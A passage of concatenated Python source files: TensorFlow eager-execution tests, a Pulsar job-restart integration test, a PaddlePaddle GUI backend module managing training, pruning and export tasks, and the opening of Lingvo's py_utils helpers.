['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute.execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute.execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1.numpy())
self.assertAllEqual([[1], [4]], x2.numpy())
self.assertAllEqual([[2], [5]], x3.numpy())
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute.execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute.execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute.execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute.execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertEquals(3, three_x.numpy())
def testOperationWithNoInputsRunsOnDevice(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).as_gpu_tensor()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute.execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
if __name__ == '__main__':
test.main()
|
integration_test_restart.py | import contextlib
import threading
import time
from .test_utils import (
TempDirectoryTestCase,
skip_unless_module,
skip_without_drmaa,
restartable_pulsar_app_provider,
integration_test,
)
from pulsar.manager_endpoint_util import (
submit_job,
)
from pulsar.managers.stateful import ActiveJobs
from pulsar.client.amqp_exchange_factory import get_exchange
from pulsar.managers.util.drmaa import DrmaaSessionFactory
class RestartTestCase(TempDirectoryTestCase):
@skip_without_drmaa
@skip_unless_module("kombu")
@integration_test
def test_restart_finishes_job(self):
with self._setup_app_provider("restart_and_finish") as app_provider:
job_id = '12345'
with app_provider.new_app() as app:
manager = app.only_manager
job_info = {
'job_id': job_id,
'command_line': 'sleep 1000',
'setup': True,
}
submit_job(manager, job_info)
external_id = None
for i in range(10):
time.sleep(.05)
# TODO: unfortunate breaking of abstractions here.
external_id = manager._proxied_manager._external_id(job_id)
if external_id:
break
if external_id is None:
assert False, "Test failed, couldn't get exteranl id for job id."
drmaa_session = DrmaaSessionFactory().get()
drmaa_session.kill(external_id)
drmaa_session.close()
consumer = self._status_update_consumer("restart_and_finish")
consumer.start()
with app_provider.new_app() as app:
consumer.wait_for_messages()
consumer.join()
assert len(consumer.messages) == 1, len(consumer.messages)
assert consumer.messages[0]["status"] == "complete"
@skip_unless_module("drmaa")
@skip_unless_module("kombu")
@integration_test
def test_recovery_failure_fires_lost_status(self):
test = "restart_and_finish"
with self._setup_app_provider(test) as app_provider:
job_id = '12345'
with app_provider.new_app() as app:
persistence_directory = app.persistence_directory
# Break some abstractions to activate a job that
# never existed.
manager_name = "manager_%s" % test
active_jobs = ActiveJobs(manager_name, persistence_directory)
active_jobs.activate_job(job_id)
consumer = self._status_update_consumer(test)
consumer.start()
with app_provider.new_app() as app:
consumer.wait_for_messages()
consumer.join()
assert len(consumer.messages) == 1, len(consumer.messages)
assert consumer.messages[0]["status"] == "lost"
@contextlib.contextmanager
def _setup_app_provider(self, test):
mq_url = "memory://test_%s" % test
manager = "manager_%s" % test
app_conf = dict(message_queue_url=mq_url)
app_conf["managers"] = {manager: {'type': 'queued_drmaa'}}
with restartable_pulsar_app_provider(app_conf=app_conf, web=False) as app_provider:
yield app_provider
def _status_update_consumer(self, test):
mq_url = "memory://test_%s" % test
manager = "manager_%s" % test
consumer = SimpleConsumer(queue="status_update", url=mq_url, manager=manager)
return consumer
class SimpleConsumer(object):
def __init__(self, queue, url, manager="_default_"):
self.queue = queue
self.url = url
self.manager = manager
self.active = True
self.exchange = get_exchange(url, manager, {})
self.messages = []
def start(self):
t = threading.Thread(target=self._run)
t.start()
self.thread = t
def join(self):
self.active = False
self.thread.join(10)
def wait_for_messages(self, n=1):
accumulate_time = 0.0
while len(self.messages) < n:
time.sleep(.1)
accumulate_time += 0.05
if accumulate_time > 3.0:
raise Exception("Waited too long for messages.")
def _run(self):
self.exchange.consume("status_update", self._callback, check=self)
def _callback(self, body, message):
self.messages.append(body)
message.ack()
def __nonzero__(self):
return self.active
__bool__ = __nonzero__ # Both needed Py2 v 3
|
task.py | # copytrue (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .. import workspace_pb2 as w
import os
import os.path as osp
import shutil
import time
import pickle
import json
import multiprocessing as mp
from ..utils import set_folder_status, TaskStatus, get_folder_status, is_available, get_ip
from .train.params import ClsParams, DetParams, SegParams
def create_task(data, workspace):
"""根据request创建task。
Args:
data为dict,key包括
'pid'所属项目id, 'train'训练参数。训练参数和数据增强参数以pickle的形式保存
在任务目录下的params.pkl文件中。 'parent_id'(可选)该裁剪训练任务的父任务,
'desc'(可选)任务描述。
"""
create_time = time.time()
time_array = time.localtime(create_time)
create_time = time.strftime("%Y-%m-%d %H:%M:%S", time_array)
id = workspace.max_task_id + 1
workspace.max_task_id = id
if id < 10000:
id = 'T%04d' % id
else:
id = 'T{}'.format(id)
pid = data['pid']
assert pid in workspace.projects, "【任务创建】项目ID'{}'不存在.".format(pid)
assert not id in workspace.tasks, "【任务创建】任务ID'{}'已经被占用.".format(id)
did = workspace.projects[pid].did
assert did in workspace.datasets, "【任务创建】数据集ID'{}'不存在".format(did)
path = osp.join(workspace.projects[pid].path, id)
if not osp.exists(path):
os.makedirs(path)
set_folder_status(path, TaskStatus.XINIT)
data['task_type'] = workspace.projects[pid].type
data['dataset_path'] = workspace.datasets[did].path
data['pretrain_weights_download_save_dir'] = osp.join(workspace.path,
'pretrain')
#获取参数
if 'train' in data:
params_json = json.loads(data['train'])
if (data['task_type'] == 'classification'):
params_init = ClsParams()
if (data['task_type'] == 'detection' or
data['task_type'] == 'instance_segmentation'):
params_init = DetParams()
if (data['task_type'] == 'segmentation' or
data['task_type'] == 'remote_segmentation'):
params_init = SegParams()
params_init.load_from_dict(params_json)
data['train'] = params_init
parent_id = ''
if 'parent_id' in data:
data['tid'] = data['parent_id']
parent_id = data['parent_id']
assert data['parent_id'] in workspace.tasks, "【任务创建】裁剪任务创建失败".format(
data['parent_id'])
r = get_task_params(data, workspace)
train_params = r['train']
data['train'] = train_params
desc = ""
if 'desc' in data:
desc = data['desc']
with open(osp.join(path, 'params.pkl'), 'wb') as f:
pickle.dump(data, f)
task = w.Task(
id=id,
pid=pid,
path=path,
create_time=create_time,
parent_id=parent_id,
desc=desc)
workspace.tasks[id].CopyFrom(task)
with open(os.path.join(path, 'info.pb'), 'wb') as f:
f.write(task.SerializeToString())
return {'status': 1, 'tid': id}
def delete_task(data, workspace):
"""删除task。
Args:
data为dict,key包括
'tid'任务id
"""
task_id = data['tid']
assert task_id in workspace.tasks, "任务ID'{}'不存在.".format(task_id)
if osp.exists(workspace.tasks[task_id].path):
shutil.rmtree(workspace.tasks[task_id].path)
del workspace.tasks[task_id]
return {'status': 1}
def get_task_params(data, workspace):
"""根据request获取task的参数。
Args:
data为dict,key包括
'tid'任务id
"""
tid = data['tid']
assert tid in workspace.tasks, "【任务创建】任务ID'{}'不存在.".format(tid)
path = workspace.tasks[tid].path
with open(osp.join(path, 'params.pkl'), 'rb') as f:
task_params = pickle.load(f)
return {'status': 1, 'train': task_params['train']}
def list_tasks(data, workspace):
'''列出任务列表,可request的参数进行筛选
Args:
data为dict, 包括
'pid'(可选)所属项目id
'''
task_list = list()
for key in workspace.tasks:
task_id = workspace.tasks[key].id
task_name = workspace.tasks[key].name
task_desc = workspace.tasks[key].desc
task_pid = workspace.tasks[key].pid
task_path = workspace.tasks[key].path
task_create_time = workspace.tasks[key].create_time
task_type = workspace.projects[task_pid].type
from .operate import get_task_status
path = workspace.tasks[task_id].path
status, message = get_task_status(path)
if data is not None:
if "pid" in data:
if data["pid"] != task_pid:
continue
attr = {
"id": task_id,
"name": task_name,
"desc": task_desc,
"pid": task_pid,
"path": task_path,
"create_time": task_create_time,
"status": status.value,
'type': task_type
}
task_list.append(attr)
return {'status': 1, 'tasks': task_list}
def set_task_params(data, workspace):
"""根据request设置task的参数。只有在task是TaskStatus.XINIT状态时才有效
Args:
data为dict,key包括
'tid'任务id, 'train'训练参数. 训练
参数和数据增强参数以pickle的形式保存在任务目录下的params.pkl文件
中。
"""
tid = data['tid']
train = data['train']
assert tid in workspace.tasks, "【任务创建】任务ID'{}'不存在.".format(tid)
path = workspace.tasks[tid].path
status = get_folder_status(path)
assert status == TaskStatus.XINIT, "该任务不在初始化阶段,设置参数失败"
with open(osp.join(path, 'params.pkl'), 'rb') as f:
task_params = pickle.load(f)
train_json = json.loads(train)
task_params['train'].load_from_dict(train_json)
with open(osp.join(path, 'params.pkl'), 'wb') as f:
pickle.dump(task_params, f)
return {'status': 1}
def get_default_params(data, workspace, machine_info):
from .train.params_v2 import get_params
from ..dataset.dataset import get_dataset_details
pid = data['pid']
assert pid in workspace.projects, "项目ID{}不存在.".format(pid)
project_type = workspace.projects[pid].type
did = workspace.projects[pid].did
result = get_dataset_details({'did': did}, workspace)
if result['status'] == 1:
details = result['details']
else:
raise Exception("Fail to get dataset details!")
train_num = len(details['train_files'])
class_num = len(details['labels'])
if machine_info['gpu_num'] == 0:
gpu_num = 0
per_gpu_memory = 0
gpu_list = None
else:
if 'gpu_list' in data:
gpu_list = data['gpu_list']
gpu_num = len(gpu_list)
per_gpu_memory = None
for gpu_id in gpu_list:
if per_gpu_memory is None:
per_gpu_memory = machine_info['gpu_free_mem'][gpu_id]
elif machine_info['gpu_free_mem'][gpu_id] < per_gpu_memory:
per_gpu_memory = machine_info['gpu_free_mem'][gpu_id]
else:
gpu_num = 1
per_gpu_memory = machine_info['gpu_free_mem'][0]
gpu_list = [0]
params = get_params(data, project_type, train_num, class_num, gpu_num,
per_gpu_memory, gpu_list)
return {"status": 1, "train": params}
def get_task_params(data, workspace):
"""根据request获取task的参数。
Args:
data为dict,key包括
'tid'任务id
"""
tid = data['tid']
assert tid in workspace.tasks, "【任务创建】任务ID'{}'不存在.".format(tid)
path = workspace.tasks[tid].path
with open(osp.join(path, 'params.pkl'), 'rb') as f:
task_params = pickle.load(f)
return {'status': 1, 'train': task_params['train']}
def get_task_status(data, workspace):
""" 获取任务状态
Args:
data为dict, key包括
'tid'任务id, 'resume'(可选):获取是否可以恢复训练的状态
"""
from .operate import get_task_status, get_task_max_saved_epochs
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
path = workspace.tasks[tid].path
status, message = get_task_status(path)
task_pid = workspace.tasks[tid].pid
task_type = workspace.projects[task_pid].type
if 'resume' in data:
max_saved_epochs = get_task_max_saved_epochs(path)
params = {'tid': tid}
results = get_task_params(params, workspace)
total_epochs = results['train'].num_epochs
resumable = max_saved_epochs > 0 and max_saved_epochs < total_epochs
return {
'status': 1,
'task_status': status.value,
'message': message,
'resumable': resumable,
'max_saved_epochs': max_saved_epochs,
'type': task_type
}
return {
'status': 1,
'task_status': status.value,
'message': message,
'type': task_type
}
def get_train_metrics(data, workspace):
""" 获取任务日志
Args:
data为dict, key包括
'tid'任务id
Return:
train_log(dict): 'eta':剩余时间,'train_metrics': 训练指标,'eval_metircs': 评估指标,
'download_status': 下载模型状态,'eval_done': 是否已保存模型,'train_error': 训练错误原因
"""
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
from ..utils import TrainLogReader
task_path = workspace.tasks[tid].path
log_file = osp.join(task_path, 'out.log')
train_log = TrainLogReader(log_file)
train_log.update()
train_log = train_log.__dict__
return {'status': 1, 'train_log': train_log}
def get_eval_metrics(data, workspace):
""" 获取任务日志
Args:
data为dict, key包括
'tid'父任务id
"""
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
best_model_path = osp.join(workspace.tasks[tid].path, "output",
"best_model", "model.yml")
import yaml
f = open(best_model_path, "r", encoding="utf-8")
eval_metrics = yaml.load(f)['_Attributes']['eval_metrics']
f.close()
return {'status': 1, 'eval_metric': eval_metrics}
def get_eval_all_metrics(data, workspace):
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
output_dir = osp.join(workspace.tasks[tid].path, "output")
epoch_result_dict = dict()
best_epoch = -1
best_result = -1
import yaml
for file_dir in os.listdir(output_dir):
if file_dir.startswith("epoch"):
epoch_dir = osp.join(output_dir, file_dir)
if osp.exists(osp.join(epoch_dir, ".success")):
epoch_index = int(file_dir.split('_')[-1])
yml_file_path = osp.join(epoch_dir, "model.yml")
f = open(yml_file_path, 'r', encoding='utf-8')
yml_file = yaml.load(f.read())
result = yml_file["_Attributes"]["eval_metrics"]
key = list(result.keys())[0]
value = result[key]
if value > best_result:
best_result = value
best_epoch = epoch_index
elif value == best_result:
if epoch_index < best_epoch:
best_epoch = epoch_index
epoch_result_dict[epoch_index] = value
return {
'status': 1,
'key': key,
'epoch_result_dict': epoch_result_dict,
'best_epoch': best_epoch,
'best_result': best_result
}
def get_sensitivities_loss_img(data, workspace):
""" 获取敏感度与模型裁剪率关系图
Args:
data为dict, key包括
'tid'任务id
"""
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
task_path = workspace.tasks[tid].path
pkl_path = osp.join(task_path, 'prune', 'sensitivities_xy.pkl')
import pickle
f = open(pkl_path, 'rb')
sensitivities_xy = pickle.load(f)
return {'status': 1, 'sensitivities_loss_img': sensitivities_xy}
def start_train_task(data, workspace, monitored_processes):
"""启动训练任务。
Args:
data为dict,key包括
'tid'任务id, 'eval_metric_loss'(可选)裁剪任务所需的评估loss
"""
from .operate import train_model
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
path = workspace.tasks[tid].path
if 'eval_metric_loss' in data and \
data['eval_metric_loss'] is not None:
# 裁剪任务
parent_id = workspace.tasks[tid].parent_id
assert parent_id != "", "任务{}不是裁剪训练任务".format(tid)
parent_path = workspace.tasks[parent_id].path
sensitivities_path = osp.join(parent_path, 'prune',
'sensitivities.data')
eval_metric_loss = data['eval_metric_loss']
parent_best_model_path = osp.join(parent_path, 'output', 'best_model')
params_conf_file = osp.join(path, 'params.pkl')
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
params['train'].sensitivities_path = sensitivities_path
params['train'].eval_metric_loss = eval_metric_loss
params['train'].pretrain_weights = parent_best_model_path
with open(params_conf_file, 'wb') as f:
pickle.dump(params, f)
p = train_model(path)
monitored_processes.put(p.pid)
return {'status': 1}
def resume_train_task(data, workspace, monitored_processes):
"""恢复训练任务
Args:
data为dict, key包括
'tid'任务id,'epoch'恢复训练的起始轮数
"""
from .operate import train_model
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
path = workspace.tasks[tid].path
epoch_path = "epoch_" + str(data['epoch'])
resume_checkpoint_path = osp.join(path, "output", epoch_path)
params_conf_file = osp.join(path, 'params.pkl')
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
params['train'].resume_checkpoint = resume_checkpoint_path
with open(params_conf_file, 'wb') as f:
pickle.dump(params, f)
p = train_model(path)
monitored_processes.put(p.pid)
return {'status': 1}
def stop_train_task(data, workspace):
"""停止训练任务
Args:
data为dict, key包括
'tid'任务id
"""
from .operate import stop_train_model
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
path = workspace.tasks[tid].path
stop_train_model(path)
return {'status': 1}
def start_prune_analysis(data, workspace, monitored_processes):
"""开始模型裁剪分析
Args:
data为dict, key包括
'tid'任务id
"""
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
task_path = workspace.tasks[tid].path
from .operate import prune_analysis_model
p = prune_analysis_model(task_path)
monitored_processes.put(p.pid)
return {'status': 1}
def get_prune_metrics(data, workspace):
""" 获取模型裁剪分析日志
Args:
data为dict, key包括
'tid'任务id
Return:
prune_log(dict): 'eta':剩余时间,'iters': 模型裁剪总轮数,'current': 当前轮数,
'progress': 模型裁剪进度
"""
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
from ..utils import PruneLogReader
task_path = workspace.tasks[tid].path
log_file = osp.join(task_path, 'prune', 'out.log')
# assert osp.exists(log_file), "模型裁剪分析任务还未开始,请稍等"
if not osp.exists(log_file):
return {'status': 1, 'prune_log': None}
prune_log = PruneLogReader(log_file)
prune_log.update()
prune_log = prune_log.__dict__
return {'status': 1, 'prune_log': prune_log}
def get_prune_status(data, workspace):
""" 获取模型裁剪状态
Args:
data为dict, key包括
'tid'任务id
"""
from .operate import get_prune_status
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
path = workspace.tasks[tid].path
prune_path = osp.join(path, "prune")
status, message = get_prune_status(prune_path)
if status is not None:
status = status.value
return {'status': 1, 'prune_status': status, 'message': message}
def stop_prune_analysis(data, workspace):
"""停止模型裁剪分析
Args:
data为dict, key包括
'tid'任务id
"""
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
from .operate import stop_prune_analysis
prune_path = osp.join(workspace.tasks[tid].path, 'prune')
stop_prune_analysis(prune_path)
return {'status': 1}
def evaluate_model(data, workspace, monitored_processes):
""" 模型评估
Args:
data为dict, key包括
'tid'任务id, topk, score_thresh, overlap_thresh这些评估所需参数
Return:
None
"""
from .operate import evaluate_model
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
pid = workspace.tasks[tid].pid
assert pid in workspace.projects, "项目ID'{}'不存在".format(pid)
path = workspace.tasks[tid].path
type = workspace.projects[pid].type
p = evaluate_model(path, type, data['epoch'], data['topk'],
data['score_thresh'], data['overlap_thresh'])
monitored_processes.put(p.pid)
return {'status': 1}
def get_evaluate_result(data, workspace):
""" 获评估结果
Args:
data为dict, key包括
'tid'任务id
Return:
包含评估指标的dict
"""
from .operate import get_evaluate_status
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
task_path = workspace.tasks[tid].path
status, message = get_evaluate_status(task_path)
if status == TaskStatus.XEVALUATED:
result_file = osp.join(task_path, 'eval_res.pkl')
if os.path.exists(result_file):
result = pickle.load(open(result_file, "rb"))
return {
'status': 1,
'evaluate_status': status,
'message': "{}评估完成".format(tid),
'path': result_file,
'result': result
}
else:
return {
'status': -1,
'evaluate_status': status,
'message': "评估结果丢失,建议重新评估!",
'result': None
}
if status == TaskStatus.XEVALUATEFAIL:
return {
'status': -1,
'evaluate_status': status,
'message': "评估失败,请重新评估!",
'result': None
}
return {
'status': 1,
'evaluate_status': status,
'message': "{}正在评估中,请稍后!".format(tid),
'result': None
}
def get_predict_status(data, workspace):
from .operate import get_predict_status
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
path = workspace.tasks[tid].path
status, message, predict_num, total_num = get_predict_status(path)
return {
'status': 1,
'predict_status': status.value,
'message': message,
'predict_num': predict_num,
'total_num': total_num
}
def predict_test_pics(data, workspace, monitored_processes):
from .operate import predict_test_pics
tid = data['tid']
if 'img_list' in data:
img_list = data['img_list']
else:
img_list = list()
if 'image_data' in data:
image_data = data['image_data']
else:
image_data = None
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
path = workspace.tasks[tid].path
save_dir = data['save_dir'] if 'save_dir' in data else None
epoch = data['epoch'] if 'epoch' in data else None
score_thresh = data['score_thresh'] if 'score_thresh' in data else 0.5
p, save_dir = predict_test_pics(
path,
save_dir=save_dir,
img_list=img_list,
img_data=image_data,
score_thresh=score_thresh,
epoch=epoch)
monitored_processes.put(p.pid)
if 'image_data' in data:
path = osp.join(save_dir, 'predict_result.png')
else:
path = None
return {'status': 1, 'path': path}
def stop_predict_task(data, workspace):
from .operate import stop_predict_task
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
path = workspace.tasks[tid].path
status, message, predict_num, total_num = stop_predict_task(path)
return {
'status': 1,
'predict_status': status.value,
'message': message,
'predict_num': predict_num,
'total_num': total_num
}
def get_quant_progress(data, workspace):
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
from ..utils import QuantLogReader
export_path = osp.join(workspace.tasks[tid].path, "./logs/export")
log_file = osp.join(export_path, 'out.log')
quant_log = QuantLogReader(log_file)
quant_log.update()
quant_log = quant_log.__dict__
return {'status': 1, 'quant_log': quant_log}
def get_quant_result(data, workspace):
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
export_path = osp.join(workspace.tasks[tid].path, "./logs/export")
result_json = osp.join(export_path, 'quant_result.json')
result = {}
import json
if osp.exists(result_json):
with open(result_json, 'r') as f:
result = json.load(f)
return {'status': 1, 'quant_result': result}
def get_export_status(data, workspace):
""" 获取导出状态
Args:
data为dict, key包括
'tid'任务id
Return:
目前导出状态.
"""
from .operate import get_export_status
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
task_path = workspace.tasks[tid].path
status, message = get_export_status(task_path)
if status == TaskStatus.XEXPORTED:
return {
'status': 1,
'export_status': status,
'message': "恭喜您,{}任务模型导出成功!".format(tid)
}
if status == TaskStatus.XEXPORTFAIL:
return {
'status': -1,
'export_status': status,
'message': "{}任务模型导出失败,请重试!".format(tid)
}
return {
'status': 1,
'export_status': status,
'message': "{}任务模型导出中,请稍等!".format(tid)
}
def export_infer_model(data, workspace, monitored_processes):
"""导出部署模型
Args:
data为dict,key包括
'tid'任务id, 'save_dir'导出模型保存路径
"""
from .operate import export_noquant_model, export_quant_model
tid = data['tid']
save_dir = data['save_dir']
epoch = data['epoch'] if 'epoch' in data else None
quant = data['quant'] if 'quant' in data else False
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
path = workspace.tasks[tid].path
if quant:
p = export_quant_model(path, save_dir, epoch)
else:
p = export_noquant_model(path, save_dir, epoch)
monitored_processes.put(p.pid)
return {'status': 1, 'save_dir': save_dir}
def export_lite_model(data, workspace):
""" 导出lite模型
Args:
data为dict, key包括
'tid'任务id, 'save_dir'导出模型保存路径
"""
from .operate import opt_lite_model
model_path = data['model_path']
save_dir = data['save_dir']
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
opt_lite_model(model_path, save_dir)
if not osp.exists(osp.join(save_dir, "model.nb")):
if osp.exists(save_dir):
shutil.rmtree(save_dir)
return {'status': -1, 'message': "导出为lite模型失败"}
return {'status': 1, 'message': "完成"}
def stop_export_task(data, workspace):
""" 停止导出任务
Args:
data为dict, key包括
'tid'任务id
Return:
目前导出的状态.
"""
from .operate import stop_export_task
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
task_path = workspace.tasks[tid].path
status, message = stop_export_task(task_path)
return {'status': 1, 'export_status': status.value, 'message': message}
def _open_vdl(logdir, current_port):
from visualdl.server import app
app.run(logdir=logdir, host='0.0.0.0', port=current_port)
def open_vdl(data, workspace, current_port, monitored_processes,
running_boards):
"""打开vdl页面
Args:
data为dict,
'tid' 任务id
"""
tid = data['tid']
assert tid in workspace.tasks, "任务ID'{}'不存在".format(tid)
ip = get_ip()
if tid in running_boards:
url = ip + ":{}".format(running_boards[tid][0])
return {'status': 1, 'url': url}
task_path = workspace.tasks[tid].path
logdir = osp.join(task_path, 'output', 'vdl_log')
assert osp.exists(logdir), "该任务还未正常产生日志文件"
port_available = is_available(ip, current_port)
while not port_available:
current_port += 1
port_available = is_available(ip, current_port)
assert current_port <= 8500, "找不到可用的端口"
p = mp.Process(target=_open_vdl, args=(logdir, current_port))
p.start()
monitored_processes.put(p.pid)
url = ip + ":{}".format(current_port)
running_boards[tid] = [current_port, p.pid]
current_port += 1
total_time = 0
while True:
if not is_available(ip, current_port - 1):
break
print(current_port)
time.sleep(0.5)
total_time += 0.5
assert total_time <= 8, "VisualDL服务启动超时,请重新尝试打开"
return {'status': 1, 'url': url}
|
py_utils.py | # Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Common utilities."""
# ==============================================================================
# Note: Avoid adding dependencies to py_utils beyond standard python packages
# and tensorflow.
# ==============================================================================
import collections as py_collections
import contextlib
import functools
import hashlib
import inspect
import math
import numbers
import os
import pkgutil
import re
import threading
import traceback
import typing
from typing import Optional, Union
import lingvo.compat as tf
from lingvo.core import cluster_factory
from lingvo.core import gshard_utils
from lingvo.core import hyperparams
from lingvo.core import nested_map
from lingvo.core import ops
from lingvo.core import py_utils_flags
from lingvo.core import retry
from lingvo.core import symbolic
from lingvo.core import thread_local_utils
from lingvo.core import tshape
import numpy as np
import six
# pylint: disable=g-direct-tensorflow-import
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.framework import func_graph
from tensorflow.python.framework import function
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import stateless_random_ops
from tensorflow.python.tf2 import enabled as tf2_enabled
from tensorflow.python.tpu import topology as tf_topology
from tensorflow.python.tpu import tpu_function
from tensorflow.python.util import deprecation
# pylint: enable=g-direct-tensorflow-import
FLAGS = tf.flags.FLAGS
# pylint: disable=protected-access
_FromGlobal = py_utils_flags._FromGlobal
# pylint: enable=protected-access
use_xla = py_utils_flags.use_xla
use_tpu = py_utils_flags.use_tpu
testonly_skip_norm_layers = py_utils_flags.testonly_skip_norm_layers
tpu_compat = py_utils_flags.tpu_compat
use_stateless_vars_init = py_utils_flags.use_stateless_vars_init
ENQUEUE_OPS = '__lingvo_enqueue_ops'
# pylint: disable=protected-access
deprecation._PRINT_DEPRECATION_WARNINGS = False
# pylint: enable=protected-access
ThreadLocalStack = thread_local_utils.ThreadLocalStack
ThreadLocalDict = thread_local_utils.ThreadLocalDict
NestedMap = nested_map.NestedMap
def Assert(condition, data, *args, **kwargs):
if py_utils_flags.enable_asserts():
return tf.Assert(condition, data, *args, **kwargs)
else:
return tf.no_op()
def assert_equal(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.assert_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater_equal(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.debugging.assert_greater_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.assert_greater(*args, **kwargs)
else:
return tf.no_op()
def assert_less_equal(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.debugging.assert_less_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_less(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.assert_less(*args, **kwargs)
else:
return tf.no_op()
def assert_between(x, l, r, *args, **kwargs): # pylint: disable=invalid-name
x = tf.convert_to_tensor(x)
l = tf.cast(tf.convert_to_tensor(l), x.dtype)
